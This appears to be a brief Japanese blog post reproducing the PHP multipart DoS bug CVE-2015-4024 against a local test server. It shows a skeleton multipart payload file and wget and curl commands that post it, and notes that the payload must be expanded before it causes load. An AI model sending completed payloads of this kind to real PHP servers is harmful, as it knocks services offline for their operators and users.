PHPのDoS脆弱性(CVE-2015-4024)キツくない?
本当にPHPのDoS脆弱性(CVE-2015-4024)キツくない?
上記のエントリを読み、さらに1ヶ月遅れだけど試してみた。
Macに入っていたPHP 5.5.20で実行。
こんな感じのファイルを用意して、
CVE-2015-4024.txt
--boundary
Content-Disposition: form-data; name="file"; filename=a
--boundary
wgetでこう
$ wget http://localhost/test.php --header="Content-Type: multipart/form-data; boundary=boundary" --post-file=CVE-2015-4024.txt
curlだとこう
$ curl http://localhost/test.php -H "Content-Type: multipart/form-data; boundary=boundary" -F "file=@CVE-2015-4024.txt"
ファイルは上記のままだと負荷はかからないので、一部をほむほむしてから実行する。
言及されているように、PHPファイルならなんでも良いので、結構キツいものがある。
以上